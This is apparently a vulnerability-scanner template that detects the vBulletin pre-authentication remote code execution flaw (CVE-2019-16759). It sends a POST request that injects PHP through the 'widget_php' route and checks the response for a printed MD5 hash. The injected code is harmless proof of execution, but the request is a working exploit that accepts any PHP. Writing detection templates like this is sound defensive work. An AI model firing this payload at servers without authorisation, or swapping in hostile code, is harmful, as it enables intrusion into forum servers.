id: php-vbulletin-rce
info:
  name: vBulletin Unauthenticated RCE - CVE-2019-16759
  risk: Critical

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5(13373311))%3bexit%3b
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', 'cc3edd8a98f001e6e8d3032221ed5425') && !StringSearch('body', 'Citrix Login')

reference:
  - link: https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/
